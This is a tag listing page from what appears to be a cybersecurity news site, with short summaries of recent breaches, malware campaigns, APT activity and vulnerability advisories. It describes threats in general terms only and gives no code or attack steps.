Tag: MONITOR

Samsung Tickets Data Leak: Infostealers Strike Again in Massive Free Dump
This article discusses a massive data breach impacting Samsung Germany, where a hacker known as “GHNA” leaked approximately 270,000 customer tickets due to credentials stolen by infostealer malware back in 2021. The breach highlights the dangers of unmonitored and unrotated credentials, leading to potential exploitation and privacy violations for thousands of customers.…
Read More
Microsoft’s killing script used to avoid Microsoft Account in Windows 11
Summary: Microsoft has removed the ‘BypassNRO.cmd’ script from Windows 11 preview builds, which enabled users to bypass the Microsoft Account requirement during OS installation. This change aims to enhance security and promote cloud-based services associated with Microsoft Accounts. While the script is gone, users can still create the bypass manually via the Windows Registry, potentially facing future restrictions on this method.…
Read More
New Crocodilus malware steals Android users’ crypto wallet keys
Summary: A new Android malware named Crocodilus employs social engineering tactics to lure users into revealing their cryptocurrency wallet seed phrases. Disseminated through a sophisticated dropper that evades Android security, it allows attackers to hijack devices and compromise bank accounts. Initially reported in Turkey and Spain, it demonstrates extensive capabilities to remotely control the device and manipulate users, putting their financial assets at risk.…
Read More
RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features
Summary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has disclosed the presence of a new malware, RESURGE, targeting vulnerabilities in Ivanti Connect Secure appliances. This malware exploits a recently patched security flaw (CVE-2025-0282) and has capabilities enhancing its evasion and operational effectiveness. It is linked to espionage activities potentially conducted by state-sponsored threat actors.…
Read More
Unveiling APT28’s Advanced Obfuscated Loader and HTA Trojan: A Deep Dive with x32dbg Debugging
APT28 has been observed conducting cyber espionage activities focusing on Central Asia and Kazakhstan. This analysis explores a heavily obfuscated malware sample, assessing its capabilities, particularly its use of VBScript and interaction with a command-and-control server. Affected: APT28, Central Asia, Kazakhstan

Keypoints :

APT28 is engaged in cyber espionage targeting Central Asia and Kazakhstan.…
Read More
New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials
Summary: Cybersecurity researchers have identified a new Android banking malware named Crocodilus that specifically targets users in Spain and Turkey. This sophisticated malware employs advanced techniques for device takeover and credential theft, masquerading as a legitimate application. It showcases the growing complexity and danger of modern mobile threats, especially within the banking sector.…
Read More

Summary: The video discusses how to install the Fing agent on a Synology NAS, a Raspberry Pi, or a Docker container to monitor networks continuously and block unwanted devices. The presenter provides a step-by-step guide on using the Synology NAS for this installation.

Keypoints:

Fing agent can be installed on a NAS, Raspberry Pi, or Docker container for 24/7 network monitoring.…
Read More
CISA has reported on three malicious files acquired from an Ivanti Connect Secure device compromised through CVE-2025-0282. The files exhibit functionalities similar to known malware, including command and control capabilities and log tampering. RESURGE, the primary file, can modify files and create a web shell. Another file, a variant of SPAWNSLOTH, tampered with logs, while the third one included a shell script that extracts kernel images.…
Read More
The Lotus Blossom, also known as Lotus Panda, is a sophisticated Chinese APT group involved in cyber espionage for over a decade. They have recently enhanced their tactics by deploying new Sagerunex backdoor variants that utilize third-party cloud services and social media for command-and-control activities. This article examines their tactics, techniques, and procedures, detailing their operational framework along with the challenges we face against such persistent threats.…
Read More
A Deep Dive into Water Gamayun’s Arsenal and Infrastructure
Trend Research reveals the exploits of Water Gamayun, a suspected Russian threat actor leveraging a zero-day vulnerability (CVE-2025-26633) in Microsoft Management Console to deploy malware. Their methods include custom payloads, data exfiltration techniques, and the use of backdoor malware. This campaign poses severe risks to organizations, including data theft and operational disruption.…
Read More
Investigative Journalists in Serbia Hit by Advanced Spyware Attack
Summary: Two Serbian journalists from the Balkan Investigative Reporting Network (BIRN) were targeted with Pegasus spyware, confirming a disturbing trend of digital surveillance against civil society in Serbia. This incident marks the third use of Pegasus spyware against Serbian activists in recent years, highlighting the ongoing repression and intimidation faced by journalists.…
Read More
Firefox Patch Released as Mozilla Addresses Chrome-Like Security Threat
Summary: Mozilla has released an urgent update for Firefox on Windows to fix a critical sandbox escape vulnerability (CVE-2025-2857) that may allow unauthorized system access. This update comes in response to a recent similar exploit found in Google Chrome, highlighting growing concerns over browser security. Users are strongly urged to update their browsers immediately to ensure protection against this and similar vulnerabilities.…
Read More
Detecting Obfuscated PowerShell Attacks Using Sysmon and the ELK Stack
This article describes a lab project focused on detecting obfuscated PowerShell attacks using Sysmon, Winlogbeat, and the ELK stack. It highlights the challenges presented by attackers utilizing PowerShell and command-line obfuscation, aiming to provide defenders with hands-on experience in threat detection. The lab teaches students to recognize malicious activities, log telemetry, and utilize practical tools for cybersecurity defenses.…
Read More
StreamElements Confirms Third-Party Data Breach from an Infostealer Infection
StreamElements has reported a serious data breach affecting over 100,000 individuals due to a third-party service provider’s compromise. Sensitive data, including names, addresses, and emails, was accessed via a Redline Infostealer infection that targeted an employee’s credentials, leading to unauthorized access to their merchandise operations. Affected: StreamElements, Gooten.com,…
Read More
Use-After-Free Vulnerability in Exim Exposes Systems to Privilege Escalation
Summary: A critical security vulnerability (CVE-2025-30232) has been discovered in Exim, a popular message transfer agent for Unix systems. This use-after-free vulnerability may allow local privilege escalation under specific conditions. Administrators of affected Exim versions are advised to apply security patches promptly and review their security practices to mitigate risks.…
Read More
Synapse Servers at Risk Due to Zero-Day DoS Flaw Exploited in the Wild
Summary: A critical zero-day vulnerability, CVE-2025-30355, has been found in Synapse, a Matrix homeserver, allowing for denial-of-service attacks through malformed events. This flaw is actively being exploited, impacting Synapse versions up to 1.127.0. Administrators are urged to upgrade to version 1.127.1 to mitigate risks.

Affected: Synapse (Matrix homeserver implementation)

Keypoints :

Vulnerability CVE-2025-30355 has a CVSS score of 7.1.…
Read More
More Solar System Vulnerabilities Expose Power Grids to Hacking 
Summary: Researchers at Forescout have identified over 90 vulnerabilities within solar power products from leading vendors like Sungrow, Growatt, and SMA, highlighting serious risks to electrical grids. Newly discovered vulnerabilities could allow attackers to hijack inverters and execute arbitrary code, potentially disrupting power supply and compromising user data.…
Read More
SnapCenter Security Flaw Rated Critical—NetApp Urges Immediate Patch
Summary: A critical security vulnerability (CVE-2025-26512) has been discovered in NetApp’s SnapCenter software, allowing authenticated users to escalate privileges and gain unauthorized administrative access. This flaw affects SnapCenter versions prior to 6.0.1P1 and 6.1P1, with a CVSS score of 9.9. While no public exploitation has been detected, organizations are urged to update to the latest versions to mitigate risks.…
Read More